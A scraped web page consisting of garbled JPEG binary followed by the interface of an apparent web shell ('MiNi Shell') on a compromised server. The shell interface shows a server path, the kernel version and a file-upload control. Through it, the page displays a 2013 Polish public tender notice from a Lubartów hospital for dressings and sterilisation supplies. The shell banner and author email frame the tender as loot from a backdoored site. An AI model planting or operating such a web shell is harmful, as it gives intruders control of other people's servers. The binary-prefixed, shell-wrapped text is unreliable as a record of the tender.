JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130612/108355-N-2013.html

<p class="kh_header"><b>Lubartów: Dostawy opatrunków  i materiałów do sterylizacji</b><br>
<b>Numer ogłoszenia: 108355 - 2013; data zamieszczenia: 12.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul.  Cicha 14, 21-100 Lubartów, woj. lubelskie, tel. 81 855 66 08, faks 81 855 66 08.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy opatrunków  i materiałów do sterylizacji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia stanowią dostwy oparunków i materiałów do sterylizacji w ilościach i asortymencie określonym w Załączniku nr 1 do SIWZ. ( w podziale na zadania) Zadanie 1 - 18.
2.Dopuszcza się składanie ofert częściowych.
3.Nie dopuszcza się składania ofert równoważnych.
4.Wspólny Słownik zamówień (CPV) : 33141100-1; 33141110-4; 33141111-1; 
     33141113-4; 33141112-8; 33141115-9; 33141119-7; 33141118-0; 33141116-6.
5.Okres ważności dostarczonego towaru  wynosi minimum 24 miesiące od daty dostawy.
6.Zamawiający dopuszcza zaoferowanie innych wielkości opakowań niż opisane  w tabeli  Załacznika nr 1, wówczas należy tak przeliczyć ilość oferowanych opakowań, aby w efekcie możliwa była realizacja całości zamówienia. W razie konieczności należy zaokrąglić ilość zaproponowanych opakowań w górę.
7.W celu oceny jakości i zgodności z SIWZ oferowanych wyrobów Zamawiający wymaga złożenia próbek, w ilościach wskazanych poniżej (dostarczone próbki nie podlegaja zwrotowi) 
(opis zawarty w poniższych tabelach jest skrótowy, pełny opis przedmiotu zamówienia zawiera Załącznik 	nr 1 do SIWZ).

Zadanie nr 1
L.p.
Przedmiot zamówienia
Charakterystyka
Próbki
1
Opaska dziana podtrzymująca
Rozmiar 15 cm x 4 m
5 szt.
2
Opaska dziana podtrzymująca
Rozmiar 10 cm x 4 m
5 szt.
3
Opaska dziana podtrzymująca
Rozmiar 5 cm x 4 m
5 szt.
4
Wata opatrunkowa
Wata opatrunkowa bawełniano- wiskozowa ( 50 % bawełny, 50 % wiskozy), op. 500 g
1 op.
5
Wata pod gips 
Opaska wyściełająca pod gips z waty, rolowana. Szerokość 15 cm x 3 m
1 szt.
6
Wata pod gips
Opaska wyściełająca pod gips z waty, rolowana. Szerokość 10 cm x 3m
1 szt.
7
Przylepiec na tkaninie
Rozmiar 1,25 cm x 5 m
2 szt.
8
Przylepiec na tkaninie 
Rozmiar 2,5 cm  5 m
2 szt.

Zadanie nr 2
L.p.
Przedmiot zamówienia
Charakterystyka
Próbki

1
Opatrunek na rany pooperacyjne 
Sterylny opatrunek samoprzylepny. Podłoże plastra wykonane z białej, elastycznej włókniny 25 cm x 10 cm
5 szt.
2
Opatrunek na rany pooperacyjne
Sterylny opatrunek samoprzylepny. Podłoże plastra wykonane z białej, elastycznej włókniny 15 cm x 8 cm
5 szt.
3
Opatrunek na rany pooperacyjne
Sterylny opatrunek samoprzylepny. Podłoże plastra wykonane z białej, elastycznej włókniny 10 cm x 8 cm
5 szt.
4
Kompresy niejałowe
Kompresy niejałowe z gazy 17- nitkowej, 16-warstowe, typ składania - zawijane brzegi, wymiary 5 cm x 5 cm, op.  100 sztuk
1 op.

Zadanie nr 3
L.p.
Przedmiot zamówienia
Charakterystyka
Próbki

1
Przylepiec do mocowania kaniul
Rozmiar 4cm x 5cm
5 szt.
2
Przylepiec do mocowania kaniul
Rozmiar 6cm x 7cm
5 szt.
3
Przylepiec do mocowania kaniul
Rozmiar 10cm x 12cm
5 szt.
4
Przylepiec do mocowania kaniul
Sterylny, cienki, hypoalergiczny, wodoodporny, z nacięciem rozmiar 8 cm x 5,8 - 6 cm 
5 szt.
5
Hypoalergiczny przylepiec włókninowy
 Rozmiar 1,25cm x 5m
5 szt.
6
Hypoalergiczny przylepiec włókninowy
 Rozmiar 2,5cm x 5m
5 szt.

Zadanie nr 4
L.p.
Przedmiot zamówienia
Charakterystyka
Próbki

1
Rękaw papierowo - foliowy do sterylizacji
Rękaw papierowo - foliowy płaski przeznaczony do sterylizacji parą wodną i tlenkiem etylenu.  rozmiar 100mm x 200m.
1 szt.

Zadanie nr 6
L.p.
Przedmiot zamówienia
Charakterystyka
Próbki

1
Seton
Seton z gazy 17nitkowej z nitką kontrastującą rtg, pakowany po 2 sztuki, sterylizowany w parze wodnej. Na opakowaniu podwójna etykieta TAG, rozmiar 2m x 5cm
2 szt.
2
Tupfer- kula
Tupfer kula wykonany z jednego fragmentu gazy bawełnianej, z nitką kontrastującą w promieniach rtg, pakowane po 5 szt. Dla zapewnienia pełnego bezpieczeństwa wszystkie brzegi podwinięte do wnętrza tupfera, sterylizowane w parze wodnej, rozmiar 15cm x 15cm  
1op.
3
Serweta operacyjna gazowa
Serweta operacyjna z gazy bawełnianej 17 nitkowej , 8 warstwowa, pakowana po 2 sztuki z nitka kontrastująca w promieniach RTG i tasiemka umożliwiająca umocowanie serwety poza polem operacyjnym . Na opakowaniu podwójna samoprzylepna etykieta typu TAG, sterylizowana w parze wodnej, rozmiar 45cm x 45 cm

5 szt
4
Kompresy z włókniny 
Kompresy z włókniny, jałowe do zabezpieczenia drenów 7,5 x 7,5 ; kompresy z nacięciem Y pakowane po 2 sztuki
2 szt.

Zadanie nr 7
L.p.
Przedmiot zamówienia
Charakterystyka
Próbki

1
Opatrunek z  gazy
Nasączony parafiną, sterylny, wyjałowiony nie przywierający do powierzchni rany do użycia na rany rozmiar 10 x 20 cm op.  po 10 szt
1 op.

Zadanie 11.
L.p.
Przedmiot zamówienia
Charakterystyka
Próbki

1
Papier do sterylizacji
Papier krepowy do opakowywania materiałów medycznych przeznaczonych do sterylizacji parą wodną oraz tlenkiem etylenu, kolor zielony, rozmiar 1300 x 1500mm

2 ark.
2
Włóknina do sterylizacji
Włóknina do sterylizacji parą wodną i tlenkiem etylenu, kolor niebieski, rozmiar 1000 x 1000mm
2 ark.

Zadanie 14.

Przedmiot zamówienia
Charakterystyka
Próbki

1
Zestaw dla noworodka
Zestaw dla noworodka:
czapeczka dla noworodka 12x10 cm, wykonana z dzianiny, 100% bawełna
kocyk flanelowy z motywem dziecięcym 160x75 cm
serweta z włókniny kompresowej 40 g m2 80x60 cm - 1 sztuka -chłonność 900%
podkład chłonny z pulpy celulozowej 60x60 cm , chłonność 1050g

1 zestaw
2
Serweta z włókniny
Serweta jałowa z włókniny kompresowej 40g m2, rozmiar 80x60 cm, -chłonność 900%,  pakowana po 2 szt.
2 op.

Zadanie 15.

Przedmiot zamówienia
Charakterystyka
Próbki

1
Podkład porodowy jednorazowego użytku
Jednorazowy, sterylny podkład porodowy wykonany z materiału wytrzymałego na rozdarcie,  antyalergicznego ( wolnego od lateksu) o rozmiarach 103 x 115 cm
1 szt.

Zadanie 17.

Przedmiot zamówienia
Charakterystyka
Próbki

1
Kompresy jałowe
Kompresy jałowe z gazy 17-nitkowej, 12 warstwowe, sterylizowane parą wodną.  Rozmiar 5cm x 5cm.  W opakownaiu torebka papierowo-foliowa lub opakowanie typu blister z   nitką kontrastującą w promieniach RTG   Waga jednej sztuki kompresu nie mniej niż 0,74g.                         
5 szt.
2
Kompresy jałowe
Kompresy jałowe z gazy 17-nitkowej, 12 warstwowe, sterylizowane parą wodną.  Rozmiar 7,5cm x 7,5cm.  W opakownaiu torebka papierowo-foliowa lub opakowanie typu blister z   nitką kontrastującą w promieniach RTG   Waga jednej sztuki kompresu nie mniej niż 1,61g.                          
5 szt.

Zadanie 18.

Przedmiot zamówienia
Charakterystyka
Próbki

1
Kompresy jałowe
Kompresy jałowe z gazy 17-nitkowej, 12 warstwowe, sterylizowane parą wodną.  Rozmiar 10cm x 10cm.  Pakowane po 10 sztuk, W opakowaniu torebka papierowo-foliowa lub opakowanie typu blister.                                                                              Waga jednej sztuki kompresu nie mniej niż 2,82g.         
10 szt.

UWAGA: 
Próbki winny znajdować się w oddzielnym opakowaniu niż oferta . 
Paczka z próbkami winna być oznaczona :Próbki do przetargu nieograniczonego na dostawy opatrunków i materiałów do sterylizacji  - Nr sprawy: SZP15-2013.      
Próbki winny być opisane.
Próbki należy złożyć w Sekretariacie SP ZOZ w Lubartowie do dnia 21.06.2013 r. do godz. 11.00.
Wewnątrz należy umieścić informacje o nazwie i adresie Wykonawcy.

Próbki - ze względu na konieczność ich wykorzystania przy testach - nie podlegają zwrotowi.
Okazanie próbki o cechach niezgodnych z opisem przedmiotu zamówienia i wymogami podanymi w SIWZ spowoduje odrzucenie oferty..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1, 33.14.11.10-4, 33.14.11.16-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Do oferty należy dołączyć oświadczenie, o posiadaniu wszelkich wymaganych dla danego towaru dokumentów dopuszczających do stosowania na rynku polskim (deklaracja zgodności,  wpis do rejestru wyrobów medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używanie)  zgodnie z ustawą z 20.05.2010r. o wyrobach medycznych (Dz. U. Nr 107 poz 679).
	Na każde pisemne żądanie Zamawiającego Wykonawca zobowiązuje się udostępnić dokument  	do wglądu.
2.Foldery, katalogi zawierające szczegółowy opis przedmiotu zamówienia w języku polskim z zaznaczeniem pozycji , której dotyczą.
3.Próbki o których mowa w dziale III pkt 7 SIWZ.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz-lubartow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Lubartowie, ul. Cicha 14, 21-100 Lubartów pokój nr 15..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2013 godzina 11:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Lubartowie, ul. Cicha 14, 21-100 Lubartów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Przylepce do kaniul.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przylepce do mocowania kankil - opis w Załączniku nr 1 do SIWZ - Pakiet nr 3..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com